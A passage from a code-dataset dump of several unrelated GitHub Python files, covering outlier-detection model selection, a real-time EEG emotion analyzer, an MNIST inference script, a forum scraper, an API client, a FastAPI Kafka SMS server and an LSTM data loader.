rank_scores[i],rank_scores[j]\n corr = kendalltau(i_s, j_s)[0]\n corr_sum += corr\n corr_sum/=(HPconfs-1)\n MC_scores.append(corr_sum)\n\n return np.argmax(MC_scores)\n\ndef HITS(OD_scores,_):\n # score_mat: (n_samples, n_HPconfs)\n score_mat = np.stack(OD_scores,axis=-1)\n \n\n rank_mat = rankdata(score_mat, axis=0)\n inv_rank_mat = 1 / rank_mat\n n_samples, n_HPconfs = score_mat.shape[0], score_mat.shape[1]\n\n hub_vec = np.full([n_HPconfs, 1], 1/n_HPconfs)\n auth_vec = np.zeros([n_samples, 1])\n\n hub_vec_list = []\n auth_vec_list = []\n\n hub_vec_list.append(hub_vec)\n auth_vec_list.append(auth_vec)\n\n for i in range(500):\n auth_vec = np.dot(inv_rank_mat, hub_vec)\n auth_vec = auth_vec/np.linalg.norm(auth_vec)\n\n # update hub_vec\n hub_vec = np.dot(inv_rank_mat.T, auth_vec)\n hub_vec = hub_vec/np.linalg.norm(hub_vec)\n\n # stopping criteria\n auth_diff = auth_vec - auth_vec_list[-1]\n hub_diff = hub_vec - hub_vec_list[-1]\n\n\n if np.abs(auth_diff.sum()) <= 1e-10 and np.abs(auth_diff.mean()) <= 1e-10 and np.abs(hub_diff.sum()) <= 1e-10 and np.abs(hub_diff.mean()) <= 1e-10:\n print('break at', i)\n break\n\n auth_vec_list.append(auth_vec)\n hub_vec_list.append(hub_vec)\n\n return np.argmax(hub_vec)\n\n\n\ndef all_model_select_algorithms(od_scores,AUCs,y):\n\n baseline_fn =[XB, MC,HITS]\n\n\n baseline_name = ['XB','MC','Hit']\n data= dict()\n for i in range(len(baseline_fn)):\n fn = baseline_fn[i]\n\n name = baseline_name[i]\n t0 = time()\n select_index = fn(od_scores,y)\n t1 = time()\n data[name] = AUCs[select_index]\n print('finish ',name,' in ',round(t1-t0,ndigits=4))\n\n\n print('\\n')\n\n return data\n\n\ndef getY(data_name,type):\n if type =='tab':\n return np.load('../data/'+data_name+'.npz')['y']\n elif type =='img':\n return np.load('../data/'+data_name+'.npz')['y']\n\n \n\n ","repo_name":"goldenNormal/AutomatedTrainingOD","sub_path":"eval_uoms/uoms_implement.py","file_name":"uoms_implement.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22999773721","text":"\"\"\" analyze_eeg.py: Core module that analyzes the eeg with time steps \"\"\"\n\n__author__ = \"Isaac Sim\"\n__copyright__ = \"Copyright 2019, The Realtime EEG Analysis Project\"\n__credits__ = [\"Isaac Sim\"]\n__license__ = \"\"\n__version__ = \"1.0.0\"\n__maintainer__ = [\"Isaac Sim\", \"Dongjoon Jeon\"]\n__email__ = \"gilgarad@igsinc.co.kr\"\n__status__ = \"Development\"\n\nfrom os.path import join\nimport numpy as np\n\nfrom keras.models import model_from_json, Model\nimport keras.backend.tensorflow_backend as K\n\nfrom neural_network.nn_models.fft_convention import FFTConvention\nfrom neural_network.utils.custom_function import ScoreActivationFromSigmoid, GetCountNonZero, GetPadMask\nfrom utils.similarity import Similarity\nfrom datetime import datetime\nfrom collections import Counter\n\nfrom typing import Type\n\nclass AnalyzeEEG:\n def __init__(self, path: str):\n \"\"\" Initialize the core module that analyzes EEG\n\n :param path:\n \"\"\"\n self.path = path\n self.fft_conv = None\n self.models = list()\n\n self.num_frame_check = 16\n self.sampling_rate = 128\n self.realtime_eeg_in_second = 3 # Realtime each ... 
seconds\n self.number_of_channel = 14\n self.count = 0\n\n self.eeg_seq_length = self.sampling_rate * self.realtime_eeg_in_second\n self.max_seq_length = self.sampling_rate * 60 * 5 #\n self.num_of_average = int(self.sampling_rate / self.num_frame_check)\n self.arousal_all = [2.0] * self.num_of_average\n self.valence_all = [2.0] * self.num_of_average\n self.fun_status = [0] * self.num_of_average\n self.immersion_status = [0] * self.num_of_average\n self.difficulty_status = [0] * self.num_of_average\n self.emotion_status = [0] * self.num_of_average\n\n self.eeg_realtime = np.zeros((self.number_of_channel, self.max_seq_length), dtype=np.float)\n # self.eeg_realtime = self.eeg_realtime.T.tolist()\n # print('Length:', len(self.eeg_realtime))\n self.fft_seq_data = np.zeros((1, 300, 140), dtype=np.float)\n self.final_score_pred = np.zeros((4, 1))\n self.seq_pos = 0\n\n self.fun_accum = 0\n self.immersion_accum = 0\n self.difficulty_accum = 0\n self.emotion_accum = 0\n\n self.fun_records = list()\n self.immersion_records = list()\n self.difficulty_records = list()\n self.emotion_records = list()\n\n self.record_start_time = 0\n self.record_duration = 0\n\n self.record_status = False\n\n # Status dictionary (will be removed once the regression model is fully applied)\n self.fun_stat_dict = { 0: '일반', 1: '재미있음' }\n self.immersion_stat_dict = { 0: '일반', 1: '몰입됨' }\n self.difficulty_stat_dict = { 0: '쉬움', 1: '어려움' }\n self.emotion_stat_dict = { 0: '즐거움', 1: '일반', 2: '짜증' }\n\n def load_models(self, model_names: str):\n \"\"\" Load models that will be used in analysis process\n\n :param model_names:\n :return:\n \"\"\"\n # TODO\n # currently 2 models for short term prediction, one for final prediction for the given model_names\n\n # Arousal Valence\n self.fft_conv = FFTConvention(path=self.path)\n\n # Load Saved Model\n for idx, (model, weight) in enumerate(model_names):\n with open(join(self.path, model), 'r') as f:\n loaded_model_json = f.read()\n\n if idx != 2:\n custom_objects = {}\n\n losses = {'amusement': 'categorical_crossentropy',\n 'immersion': 'categorical_crossentropy',\n 'difficulty': 'categorical_crossentropy',\n 'emotion': 'categorical_crossentropy'}\n\n else:\n custom_objects = {\n 'ScoreActivationFromSigmoid': ScoreActivationFromSigmoid,\n 'GetPadMask': GetPadMask, 'GetCountNonZero': GetCountNonZero}\n\n losses = {'amusement': 'mean_squared_error',\n 'immersion': 'mean_squared_error',\n 'difficulty': 'mean_squared_error',\n 'emotion': 'mean_squared_error'}\n\n with K.tf.device('/cpu:0'):\n loaded_model = model_from_json(loaded_model_json, custom_objects=custom_objects)\n loaded_model.load_weights(join(self.path, weight))\n loss_weights = {'amusement': 1.0, 'immersion': 1.0, 'difficulty': 1.0, 'emotion': 1.0}\n loaded_model.compile(loss=losses, loss_weights=loss_weights, optimizer='adam', metrics=['accuracy'])\n self.models.append(loaded_model)\n\n # print('Model Object at initial', self.model)\n\n def set_record_status(self, analyze_status: int):\n \"\"\" By the external command (like UI), set the record status to start and or stop record the EEG\n and its analysis data\n\n :param analyze_status:\n :return:\n \"\"\"\n if analyze_status == 1 and not self.record_status:\n self.record_start_time = datetime.now()\n self.record_status = True\n elif analyze_status == 2 and self.record_status:\n self.record_status = False\n self.analyze_final_prediction()\n elif analyze_status == 3: # reset all recorded data\n self.emotion_records = list()\n self.fun_records = list()\n 
self.difficulty_records = list()\n self.immersion_records = list()\n self.record_start_time = 0\n self.record_duration = 0\n self.fft_seq_data = np.zeros((1, 300, 140), dtype=np.float)\n self.seq_pos = 0\n self.final_score_pred = np.zeros((4, 1))\n\n def store_eeg_rawdata(self, eeg_rawdata: list):\n \"\"\" Stores the new rawdata to the matrix that holds the data a certain period of time.\n\n :param eeg_rawdata:\n :return:\n \"\"\"\n\n new_data = eeg_rawdata[3: 3 + self.number_of_channel]\n self.eeg_realtime = np.insert(self.eeg_realtime, self.max_seq_length, new_data, axis=1)\n self.eeg_realtime = np.delete(self.eeg_realtime, 0, axis=1)\n self.count += 1\n\n def build_middle_layer_pred(self, model: Type[Model]):\n \"\"\" Function to get the middle-layer prediction of the model\n\n :param model:\n :return:\n \"\"\"\n show_layers = [13, 14, 15, 16, 33, 34, 35, 36] # 0 ~ 36 (13~16step scores, 33~34 final scores)\n layers_outputs = list()\n for i in range(1, 37):\n if i in show_layers:\n layers_outputs.append(model.layers[i].output)\n\n middle_layer_output = K.function([model.layers[0].input],\n layers_outputs)\n\n return middle_layer_output\n\n def analyze_eeg_data(self, all_channel_data: np.ndarray):\n \"\"\" Process all data from EEG data to predict.\n Currently four labels (Amusement, Immersion, Difficulty, Emotion). NOT USED FOR NOW\n\n :param all_channel_data:\n :return:\n \"\"\"\n \"\"\" \n \n Input: Channel data with dimension N x M. N denotes number of channel and M denotes number of EEG data from each channel.\n Output: Class of emotion between 1 to 5 according to Russel's Circumplex Model. And send it to web ap\n \"\"\"\n\n # Get feature from EEG data\n feature = self.fft_conv.get_feature(all_channel_data)\n # only ten features retrieved from frequency form\n feature_basic = feature.reshape((14, 18))\n feature_basic = feature_basic[:, :10]\n feature_basic = feature_basic.ravel()\n\n # Emotion Prediction by Nadzeri's source\n class_ar = Similarity.compute_similarity(feature=feature_basic, all_features=self.fft_conv.train_arousal,\n label_all=self.fft_conv.class_arousal[0])\n class_va = Similarity.compute_similarity(feature=feature_basic, all_features=self.fft_conv.train_valence,\n label_all=self.fft_conv.class_valence[0])\n emotion_class = self.fft_conv.determine_emotion_class(class_ar, class_va)\n\n x_test = feature_basic.reshape(1, 14, 10, 1)\n\n ratio = [0.5, 0.5, 0.5]\n y_pred = None\n for idx, model in enumerate(self.models):\n if idx == 2:\n # print('Middle Layer pred', datetime.now())\n _x_test = feature_basic.reshape(1, 1, 140)\n fft_seq_data = np.zeros((1, 300, 140), dtype=np.float)\n fft_seq_data = np.insert(fft_seq_data, 0, _x_test, axis=1)\n fft_seq_data = np.delete(fft_seq_data, 300, axis=1)\n _y_pred = model.predict([fft_seq_data])\n # print(idx, _y_pred)\n # break\n else:\n continue\n # _y_pred = model.predict(x=x_test, batch_size=1)\n # print(idx, _y_pred)\n #\n # if y_pred is None: # first\n # y_pred = list()\n # for y_elem in _y_pred:\n # y_pred.append(ratio[idx] * y_elem)\n # else: # sum\n # new_pred = list()\n # for y_elem, _y_elem in zip(y_pred, _y_pred):\n # y_elem_sum = np.sum([y_elem, ratio[idx] * _y_elem], axis=0)\n # new_pred.append(y_elem_sum)\n # y_pred = new_pred\n #\n # fun = np.argmax(y_pred[0], axis=1)[0] # Fun Prediction\n # difficulty = np.argmax(y_pred[1], axis=1)[0] # Difficulty Prediction\n # immersion = np.argmax(y_pred[2], axis=1)[0] # Immersion Prediction\n # emotion = np.argmax(y_pred[3], axis=1)[0] # Emotion Prediction\n\n fun = 
_y_pred[0][0][0]\n difficulty = _y_pred[1][0][0]\n immersion = _y_pred[2][0][0]\n emotion = _y_pred[3][0][0]\n # print(fun, difficulty, immersion, emotion)\n # print('')\n\n return emotion_class, class_ar, class_va, fun, difficulty, immersion, emotion, feature_basic\n\n def analyze_final_prediction(self):\n \"\"\" Make a final prediction for entire data in sequence from record start to record end\n\n :return:\n \"\"\"\n model = self.models[2] # [TEMP]\n # layers_outputs = list()\n # for i in range(1, 38):\n # layers_outputs.append(model.layers[i].output)\n #\n # get_3rd_layer_output = K.function([model.layers[0].input],\n # layers_outputs)\n #\n # _layer_output = get_3rd_layer_output([eeg_data])\n # for i in range(0, 37): # 0 ~ 36 (13~16step scores, 33~34 final scores)\n # layer_output = _layer_output[i]\n # print(layer_output)\n # print(len(layer_output[0]))\n # print('')\n\n _y_pred = model.predict([self.fft_seq_data])\n # print('analyze_final_prediction:', _y_pred)\n # print(len(np.where(np.sum(self.fft_seq_data, axis=2) ==0)[1]))\n self.final_score_pred = _y_pred\n return _y_pred\n\n def analyze_and_evaluate_moment(self):\n \"\"\" Analyze and predict the moment of three seconds window size.\n\n :return:\n \"\"\"\n # eeg_realtime = np.array(self.eeg_realtime).T\n eeg_realtime = self.eeg_realtime\n # Analyze\n emotion_class, class_ar, class_va, fun, difficulty, immersion, emotion, feature_basic = \\\n self.analyze_eeg_data(eeg_realtime[:, -self.eeg_seq_length:])\n\n # stat_code\n if fun >= 6:\n fun_stat_code = 1\n else:\n fun_stat_code = 0\n\n if immersion >= 5:\n immersion_stat_code = 1\n else:\n immersion_stat_code = 0\n\n if difficulty >= 5:\n difficulty_stat_code = 1\n else:\n difficulty_stat_code = 0\n\n if emotion > 6:\n emotion_stat_code = 0\n elif emotion >= 4:\n emotion_stat_code = 1\n else:\n emotion_stat_code = 2\n\n # print(fun_stat_code, immersion_stat_code, difficulty_stat_code, emotion_stat_code)\n\n # Last calculation for moment analysis\n if self.count == self.sampling_rate:\n # print('Sampling Rate:', self.count)\n emotion_dict = {\n 1: \"fear - nervous - stress - tense - upset\",\n 2: \"happy - alert - excited - elated\",\n 3: \"relax - calm - serene - contented\",\n 4: \"sad - depressed - lethargic - fatigue\",\n 5: \"neutral\"\n }\n class_ar = np.round(np.mean(self.arousal_all))\n class_va = np.round(np.mean(self.valence_all))\n\n # emotion_class = self.fft_conv.determine_emotion_class(class_ar, class_va)\n\n if self.record_status:\n self.fun_records.append(fun_stat_code)\n self.immersion_records.append(immersion_stat_code)\n self.difficulty_records.append(difficulty_stat_code)\n self.emotion_records.append(emotion_stat_code)\n self.record_duration = (datetime.now() - self.record_start_time).seconds\n x_test = feature_basic.reshape(1, 1, 140)\n if self.seq_pos == 300:\n self.fft_seq_data = np.insert(self.fft_seq_data, self.seq_pos, x_test, axis=1)\n self.fft_seq_data = np.delete(self.fft_seq_data, 0, axis=1)\n else:\n self.fft_seq_data = np.insert(self.fft_seq_data, self.seq_pos, x_test, axis=1)\n self.fft_seq_data = np.delete(self.fft_seq_data, 300, axis=1)\n self.seq_pos += 1\n\n self.count = 0\n\n if len(self.valence_all) == self.num_of_average:\n self.valence_all.pop(0)\n self.arousal_all.pop(0)\n self.fun_status.pop(0)\n self.difficulty_status.pop(0)\n self.immersion_status.pop(0)\n self.emotion_status.pop(0)\n\n # Analyze result sum\n self.arousal_all.append(class_ar)\n self.valence_all.append(class_va)\n self.fun_status.append(fun)\n 
self.difficulty_status.append(difficulty)\n self.immersion_status.append(immersion)\n self.emotion_status.append(emotion)\n\n\n\n # draw graph\n d = {\n 'eeg_realtime': eeg_realtime[:, self.max_seq_length - 1],\n 'arousal_all': np.array(self.arousal_all),\n 'valence_all': np.array(self.valence_all),\n # 'fun_stat': self.fun_stat_dict[self.final_fun],\n # 'immersion_stat': self.immersion_stat_dict[self.final_immersion],\n # 'difficulty_stat': self.difficulty_stat_dict[self.final_difficulty],\n # 'emotion_stat': self.emotion_stat_dict[self.final_emotion],\n 'fun_stat': self.fun_stat_dict[fun_stat_code],\n 'immersion_stat': self.immersion_stat_dict[immersion_stat_code],\n 'difficulty_stat': self.difficulty_stat_dict[difficulty_stat_code],\n 'emotion_stat': self.emotion_stat_dict[emotion_stat_code],\n 'fun_stat_record': self.counter(self.fun_records, self.fun_stat_dict),\n 'immersion_stat_record': self.counter(self.immersion_records, self.immersion_stat_dict),\n 'difficulty_stat_record': self.counter(self.difficulty_records, self.difficulty_stat_dict),\n 'emotion_stat_record': self.counter(self.emotion_records, self.emotion_stat_dict),\n 'record_duration': self.record_duration,\n 'fun_status': self.fun_status,\n 'immersion_status': self.immersion_status,\n 'difficulty_status': self.difficulty_status,\n 'emotion_status': self.emotion_status,\n 'final_score_pred': self.final_score_pred\n }\n\n return d\n\n def most_common(self, target_list: list, last_status: int):\n \"\"\" Find most common\n\n :param target_list:\n :param last_status:\n :return:\n \"\"\"\n a = Counter(target_list).most_common(2)\n final_status = int(a[0][0])\n if len(a) != 1 and a[0][1] == a[1][1]:\n if int(a[0][0]) == last_status or int(a[1][0]) == last_status:\n final_status = last_status\n return final_status\n\n def counter(self, data: list, data_dict: dict):\n \"\"\" Counts the duplicate elements\n\n :param data:\n :param data_dict:\n :return:\n \"\"\"\n counter_dict = dict()\n data = [str(d) for d in data]\n data = Counter(data)\n for k, v in data_dict.items():\n counter_dict[v] = data[str(k)]\n\n return counter_dict\n","repo_name":"gilgarad/realtime_eeg_analyzer","sub_path":"realtime_eeg/analyze_eeg.py","file_name":"analyze_eeg.py","file_ext":"py","file_size_in_byte":16631,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"10915882082","text":"import sys, os\nsys.path.append(os.pardir)\n\nfrom dataset.mnist import load_mnist\n\n# (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)\n\n# print(x_train.shape)\n# print(t_train.shape)\n# print(x_test.shape)\n# print(t_test.shape)\n\nimport numpy as np\n\n# 이미지 확인하기\n# from PIL import Image\n\n# def img_show(img):\n# pil_img = Image.fromarray(np.uint8(img))\n# pil_img.show()\n\n# img = x_train[0]\n# label = t_train[0]\n# print(label)\n\n# print(img.shape)\n# img = img.reshape(28, 28)\n# print(img.shape)\n\n# img_show(img)\n\n\nimport pickle\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n# softmax function - improve over flow \ndef softmax(a):\n c = np.max(a)\n exp_a = np.exp(a - c)\n sum_exp_a = np.sum(exp_a)\n y = exp_a / sum_exp_a\n return y\n\n\ndef get_data():\n (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, flatten=True, one_hot_label=False)\n return x_test, t_test\n\ndef init_network():\n with open(\"sample_weight.pkl\", 'rb') as f:\n network = pickle.load(f)\n \n return network\n\ndef predict(network, x):\n W1, W2, W3 = network['W1'], network['W2'], 
network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n\n a3 = np.dot(z2, W3) + b3\n y = softmax(a3)\n\n return y\n\nx, t = get_data()\nnetwork = init_network()\n\nbatch_size = 100 # batch size\naccuracy_cnt = 0\n# for i in range(len(x)):\nfor i in range(0, len(x), batch_size):\n x_batch = x[i:i+batch_size] # i'th ~ i+batch_size'th\n y_batch = predict(network, x_batch)\n p = np.argmax(y_batch, axis = 1)\n accuracy_cnt += np.sum(p == t[i:i+batch_size])\n\n # y = predict(network, x[i])\n # p = np.argmax(y)\n # if p == t[i]:\n # accuracy_cnt += 1\n \nprint(\"Accuracy:\" + str(float(accuracy_cnt) / len(x)))\n","repo_name":"stainblue/DeepLearning_study","sub_path":"DeepLearning_from_Scratch/03_Neural_Network/use_mnist.py","file_name":"use_mnist.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71399397686","text":"from nio.modules.context import ModuleContext\nfrom nio.testing.modules.settings import Settings\nfrom nio.modules.settings.module import SettingsModule\n\n\nclass TestingSettingsModule(SettingsModule):\n\n def initialize(self, context):\n super().initialize(context)\n if not context.in_service:\n self.proxy_settings_class(Settings)\n else:\n # Don't proxy Settings, we want NotImplementedError to be raised\n # inside the service process\n pass\n\n def finalize(self):\n super().finalize()\n\n def prepare_core_context(self):\n context = ModuleContext()\n context.in_service = False\n return context\n\n def prepare_service_context(self, service_context=None):\n context = ModuleContext()\n context.in_service = True\n return context\n","repo_name":"niolabs/nio","sub_path":"nio/testing/modules/settings/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"24420096340","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport requests\n\n\nclass ApiClient(object):\n def __init__(self, baseURL, endpointURL, params):\n self.baseURL = baseURL\n self.endpointUrl = endpointURL\n self.params = params\n\n def _url(self, query):\n url = (self.baseURL + self.endpointUrl).format(str(query))\n print('URL: ' + url)\n return url\n\n def make_request(self, body=None):\n if self.params['method'] == 'GET':\n print('-----------------')\n print(self.params)\n return requests.get(self._url(self.params['query']))\n\n if self.params['method'] == 'POST':\n return requests.get(self._url(self.params['query']), json=body)\n\n\ndef sentiments(endpoint, text):\n sent_url = 'https://octak.herokuapp.com/'\n endpoint_rulz = endpoint + '?text={:s}'\n\n params = {\n 'method' : 'GET',\n 'query' : text\n }\n\n response = ApiClient(sent_url, endpoint_rulz, params).make_request()\n\n if response.status_code == 200:\n return response.json()\n else:\n return [{}]\n\n\n\n\ndef check_source(title):\n news_search_url = 'http://spnl-news-search.apphb.com/'\n news_search_endpoint = 'api/News/searchnews?query={:s}'\n\n params = {\n 'method' : 'GET',\n 'query' : title\n }\n\n response = ApiClient(news_search_url, news_search_endpoint, params).make_request()\n\n if response.status_code == 200:\n return response.json()\n else:\n return 
[{}]\n","repo_name":"calincrist/weak_signals","sub_path":"spln/LocalModules/ApiClientModule/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"4085412565","text":"from __future__ import annotations\n\nimport inspect\nfrom typing import (\n Any,\n Callable,\n Generic,\n Optional,\n Protocol,\n TypeVar,\n cast,\n runtime_checkable,\n)\n\nfrom marimo._utils.format_signature import format_signature\n\n_WRAP_WIDTH = 72\n\n\ndef _format_parameter(parameter: inspect.Parameter) -> str:\n annotation = (\n \"\"\n if parameter.annotation == inspect.Parameter.empty\n else \": \" + cast(str, parameter.annotation)\n )\n default = (\n \"\"\n if parameter.default == inspect.Parameter.empty\n else f\" = '{str(parameter.default)}'\"\n if isinstance(parameter.default, str)\n else f\" = {str(parameter.default)}\"\n )\n return parameter.name + annotation + default\n\n\ndef _get_signature(obj: Any) -> str:\n name = cast(str, obj.__name__)\n try:\n signature = inspect.signature(obj)\n except Exception:\n # classes with fancy metaclasses, like TypedDict, can throw\n # an exception\n return name + \": \" + str(type(obj))\n\n parameters = \", \".join(\n [\n _format_parameter(parameter)\n for parameter in signature.parameters.values()\n ]\n )\n if inspect.isclass(obj):\n signature_text = name + \"(\" + parameters + \")\"\n return format_signature(\"class \", signature_text, width=_WRAP_WIDTH)\n else:\n return_annotation = (\n \" -> \" + signature.return_annotation\n if (\n signature.return_annotation != inspect.Signature.empty\n and signature.return_annotation\n )\n else \"\"\n ) + \":\"\n signature_text = (\n name + \"(\" + parameters + \")\" + cast(str, return_annotation)\n )\n return format_signature(\"def \", signature_text, width=_WRAP_WIDTH)\n\n\ndef _doc_with_signature(obj: Any) -> str:\n \"\"\"Return docstring with its signature prepended.\"\"\"\n signature = \"```python\\n\" + _get_signature(obj) + \"\\n```\"\n return (\n signature + \"\\n\\n\" + inspect.cleandoc(cast(str, obj.__doc__))\n if obj.__doc__ is not None\n else signature\n )\n\n\nT = TypeVar(\"T\", bound=Callable[..., Any])\n\n\n@runtime_checkable\nclass RichHelp(Protocol, Generic[T]):\n \"\"\"Protocol to provide a class or function docstring formatted as markdown.\n\n Implement the protocol by implementing a `_rich_help_` static method, which\n should render a Markdown string documenting the class. 
For example:\n\n ```python3\n class MyClass:\n \\\"\\\"\\\"**MyClass.**\n\n A class implementing the `RichHelp` protocol.\n \\\"\\\"\\\"\n\n @staticmethod\n def _rich_help_() -> Optional[str]:\n return MyClass.__doc__\n ```\n \"\"\"\n\n @staticmethod\n def _rich_help_() -> Optional[str]:\n return _doc_with_signature(RichHelp)\n\n __call__: T\n\n\ndef mddoc(obj: T) -> T:\n \"\"\"Adds a `_rich_help_` method to the passed in object.\n\n Returns `obj`, with modification to implement the `RichHelp` protocol.\n \"\"\"\n rich_help = cast(RichHelp[T], obj)\n rich_help._rich_help_ = lambda: _doc_with_signature( # type: ignore[method-assign] # noqa: E501\n obj\n )\n # cast back to original type, so type-hinters provide helpful information\n return cast(T, rich_help)\n","repo_name":"marimo-team/marimo","sub_path":"marimo/_output/rich_help.py","file_name":"rich_help.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":521,"dataset":"github-code","pt":"76"} +{"seq_id":"4146160904","text":"from bs4 import BeautifulSoup\nimport requests\nfrom datetime import date\nimport csv\nreq=requests.get(\"https://www.nairaland.com/#featured\").text\nsoup=BeautifulSoup(req, 'lxml' )\ntr=soup.find(\"td\",class_=\"featured w\")\ntodays_date=date.today()\ncurrent_month=todays_date.strftime(\"%b\")\ncurrent_day=todays_date.strftime(\"%d\")\ncsv_file=open(\"/storage/emulated/0/my_website_scrape.csv\",\"w\")\ncsv_writer=csv.writer(csv_file)\ncsv_writer.writerow([\"username\",\"post_header\",\"section\",\"day_posted\",\"month_posted\",\"time_posted\"])\nfor a_tag in tr.find_all(\"a\"):\n\t\n\tlink=a_tag.get(\"href\")\n\t\n\tindividual_post_requests=requests.get(link).text\n\tpost_soup=BeautifulSoup(individual_post_requests,\"lxml\")\n\ttime_date_span_list=post_soup.find(\"span\",class_=\"s\").text.split(\" On \")\n\ttime=time_date_span_list[0]\n\t#posts that were created today do not show month and day so i have to assign it to todays date if it was created today\n\ttry:\n\t\tmonth_day_list=time_date_span_list[1].split(\" \")\n\texcept IndexError:\n\t\tmonth_day_list=[current_month,current_day]\n\tmonth=month_day_list[0]\n\tday=month_day_list[1]\n\theader_with_section_as_list=post_soup.find(\"h2\").text.split(\" - \")\n\theader=header_with_section_as_list[0]\n\tsection=header_with_section_as_list[1]\n\n\tuser=post_soup.find(\"a\",class_=\"user\").text\n\tprint(user)\n\tprint(header)\n\tprint(section)\n\tprint(day)\n\tprint(month)\n\tprint(time)\n\tcsv_writer.writerow([user,header,section,day,month,time])\n\ncsv_file.close()","repo_name":"saheedniyi02/website-scrape","sub_path":"beautiful 😍😍.py","file_name":"beautiful 😍😍.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28326659599","text":"from fastapi import FastAPI\n# from functools import lru_cache\nimport logging\nimport requests\nimport json\nfrom serializer import BytesEncoder\nfrom ui import frontend\nfrom worker.router import router as worker_router\nfrom helpers import generate_sms_destinations, generate_sms_payload\nfrom configs.csets import settings\nfrom configs.clog import LOGGER\nfrom worker.service import consume_all\nimport asyncio\n\napp = FastAPI()\napp.include_router(frontend.router)\napp.include_router(worker_router)\n\n@app.get(\"/\")\nasync def root():\n return {\"server\": \"I'm alive\"}\n\n@app.get('/ping')\ndef index_request():\n return {\"message\": 
\"pong\"}\n\n@app.get('/health_check')\ndef index_request():\n return {\n \"message\": \"healthy\"\n }\n\nURL = settings.wg_url\nphone_nums = settings.test_phone_nums\n\n@app.get('/push_multiple')\nasync def multiple_request(num: int):\n destinations = generate_sms_destinations(phone_nums, num)\n json_destinations = json.dumps(destinations)\n # print(json_destinations)\n LOGGER.info(json_destinations)\n\n msg = 'Sorry to bother you, this is a test broadcast message. After reading this throw your phone away'\n msg = msg.encode('utf-8')\n payload = generate_sms_payload(msg, destinations)\n \n try:\n headers={'Content-Type': 'application/json'}\n response = requests.post(URL, data=json.dumps(payload, cls=BytesEncoder), headers=headers)\n json_response = response.json()\n # print(json_response)\n LOGGER.info(json_response)\n if response.status_code == 200:\n return {\n \"success\": True,\n \"message\": \"Messages sent\",\n \"result\": json_response,\n }\n \n except Exception as ex:\n LOGGER.error(ex)\n return {\n \"success\": False,\n \"message\": str(ex),\n }\n \n return {\n \"success\": False,\n \"message\": \"Messages could not be sent\",\n }\n\n@app.on_event(\"startup\")\nasync def startup_event():\n try:\n await consume_all()\n LOGGER.info('App Events started successful')\n pass\n except Exception as e:\n # print('App Events startup error', str(e))\n LOGGER.info('App Events startup error')\n LOGGER.info(str(e))\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event():\n try:\n # unsubscribe\n LOGGER.info('App Events shutdown successful')\n pass\n except Exception as e:\n # print('App Events shutdown error', str(e))\n ev_loop = asyncio.get_event_loop()\n ev_loop.stop()\n ev_loop.close()\n LOGGER.info('App Events shutdown error')\n LOGGER.info(str(e))\n\n","repo_name":"cephydex/fastapi-kafka-single-topic","sub_path":"consumer1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20994822433","text":"import os\nimport sys\n\nimport numpy\nimport pandas\nimport matplotlib.pyplot as plt\n\nfrom keras.layers import Dense, LSTM\nfrom keras.models import Sequential\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom tqdm import trange\n\n\n# For reproducibility\n# numpy.random.seed(10)\n\n\ndef load_dataset(filename: str) -> (numpy.ndarray, MinMaxScaler):\n\n \"\"\"\n The functions focuses on loading the dataset and then normalising the\n loaded data\n\n :paramaters \n - filename: filename of the file to load\n\n :return:\n - a dataset as a tuple \n - the MinMaxScaler object to be used\n \"\"\"\n\n # Loads the datasource passed in into a dataframe\n dataframe = pandas.read_csv(filename, usecols=[1])\n dataframe = dataframe.fillna(method='pad')\n\n # Transforms data frame into a working dataset of float\n dataset = dataframe.values\n dataset = dataset.astype('float32')\n\n # Proceeds to then normalize the dataset\n mmscale = MinMaxScaler(feature_range=(0, 1))\n dataset = mmscale.fit_transform(dataset)\n\n return dataset, mmscale\n\ndef split_dataset(dataset: numpy.ndarray, training_size, look_back) -> (numpy.ndarray, numpy.ndarray):\n\n \"\"\"\n Splits dataset into training and test datasets. 
The last `look_back` rows in train dataset\n will be used as `look_back` for the test dataset.\n\n :parameters \n - dataset: the original dataset\n - training_size: specifies the size to be used for the training data\n - look_back: The number of previous time steps\n\n :return\n - tuple of x for training or test dataset\n - tuple of y for training or test dataset\n \"\"\"\n\n if not training_size > look_back:\n raise ValueError('training_size must be larger than the look_back size')\n\n train, test = dataset[0:training_size, :], dataset[training_size - look_back:len(dataset), :]\n #print('train_dataset: {}, test_dataset: {}'.format(len(train), len(test)))\n\n return train, test\n\n\ndef create_dataset(dataset: numpy.ndarray, look_back: int=1) -> (numpy.ndarray, numpy.ndarray):\n\n \"\"\"\n This function uses the dataset and the look back (number of previous steps as input variables), \n which calculates the next time period. \n\n :parameter:\n - dataset: the dataset\n - look_back: number of previous steps as input variables (Int)\n\n :return: \n - tuple creating input and output set\n \"\"\"\n data_x, data_y = [], []\n\n # Append the dataset\n for i in range(len(dataset)-look_back-1):\n a = dataset[i:(i+look_back), 0]\n 